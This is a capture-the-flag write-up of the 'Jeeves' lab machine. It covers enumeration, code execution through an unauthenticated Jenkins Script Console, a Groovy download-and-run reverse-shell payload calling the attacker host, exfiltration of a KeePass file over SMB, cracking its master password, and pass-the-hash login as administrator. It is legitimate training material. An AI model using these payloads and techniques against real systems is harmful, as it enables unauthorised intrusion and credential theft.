
Exploitation Summary
Initial Exploitation
- Vulnerability: Remote code execution via Jenkins Script Console
- Explanation: Jenkins management console is available without login and resulted in code execution through the Script Console
Privilege Escalation
- Vulnerability: Weak master password of keepass file
- Explanation: keepass is used to store credentials including some administrative credentials. However, weak password is used to protect the keepass file, leading to exposure of administrative credentials
Enumeration
nmap -p- -A -T4 10.10.10.63

TCP 80: IIS 10.0 TCP 135: RPC TCP 445: Microsoft-ds TCP 50000: Jetty 9.4.z-SNAPSHOT (http)
Initial Shell Exploitation
Quick check on port 445 using smbmap -H 10.10.10.63 shows that credentials is needed. So there’s not much information to gather from port 445. There seems to be 2 website running, one on port 80 and another one on port 50000. Let’s check out the website on default port 80 first.

Cool, look like we can ask Jeeves some questions. I just randomly type something and click Search.

Oh wow. Am I lucky? Could this be the entry point? I go back and do a few more searches. Interestingly, all resulted in the same error. I then check out the source of the search page.

It turns out the search ALWAYS returns the error page, no matter what. So it’s not really doing any search dynamically.
Ok, let’s check out the other website:

Ah, there’s no content on this website.
Directory scan using gobuster
Gobuster does not find any interesting folder on port 80 but is able to find a directory /askjeeves on port 50000 using the following command:
gobuster dir -u http://10.10.10.63:50000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -l -s "200,204,301,302,307,401,403"

Navigate to http://10.10.10.63:50000/askjeeves

Jenkins. Nice, finally find something. What’s even better is that it doesn’t seem to require login and I can access the script console at Manage Jenkins > Script Console

Jenkins is an open source automation server with hundreds of plugins to support building, deploying and automating any project. Script console allows you to execute arbitrary code using Groovy script. For more information about Jenkins, check out https://jenkins.io
Let’s test by running the command ‘whoami‘ using the following groovy script:
def sout = new StringBuffer(), serr = new StringBuffer() String ps = 'whoami' def proc = ps.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr"

The command is executed successfully and reveals that the user hosting the website is jeeves\kohsuke
I would like to get a reverse shell using Powershell script. Let’s check if Powershell is available by changing the command to:
String ps = 'cmd /c "cd / && dir powershell.exe /s"'

Nice, Powershell is available. Now I would like to use Invoke-PowerShellTcp.ps1 from nishange to get a reverse shell.
Setup webserver to host the file Invoke-PowerShellTcp.ps1
If you don’t already have this powershell script, you can install nishang by:
apt-get install nishang
I would also append the follow code to automatically invoke the reverse shell when the script is uploaded:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.34 -Port 443

Netcat to listen on port 443
nc -nvlp 443
Run following script to upload Invoke-PowerShellTcp.ps1 & execute:
def sout = new StringBuffer(), serr = new StringBuffer() String cmd = "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.34/Invoke-PowerShellTcp.ps1')" String ps = 'powershell -c "' + cmd + '"' def proc = ps.execute() proc.consumeProcessOutput(sout, serr) println "out> $sout err> $serr"


Got the user shell!
User flag

Privilege Escalation
Browsing around C:\Users\kohsuke I quickly find an interesting file CEH.kdbx at C:\Users\kohsuke\documents. Looks like it’s a keepass file used to store and protect credentials.

Download CEH.kdbx using smbserver
impacket-smbserver Share `pwd`

Folder /root/work is now shared using name called Share and is accessible at \\10.10.14.34\Share. Now issue the copy command:
copy CEH.kdbx \\10.10.14.34\Share

Crack keepass master password
keepass2john CEH.kdbx > keepass-hash john keepass-hash --wordlist=/usr/share/wordlists/rockyou.txt

Found the master password: moonshine1
Open CEH.kdbx using keepass
I download keepass and install it on my Windows VM to open CEH.kdbx

Enter the master password to reveal the credentials

There’s a bunch of passwords. If any of the password is for administrator, we can login using pth-winexe through port 445.
Tried all passwords and failed. The very last credentials with title ‘Backup stuff’ is not a password, but instead password hash and looks like NTLM hash. We can try pass the hash login.
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe

Got it. Logged in as administrator.
Root flag
There’s no root.txt but instead found hm.txt which tells me to look deeper. Running command dir /R reveals a hidden file hm.txt:root.txt using Alternate Data Stream. The content of the hidden file can be retrieved using the following powershell script
Get-Content -Path hm.txt -Stream root.txt

Thank you box Jeeves’s creator, mrb3n!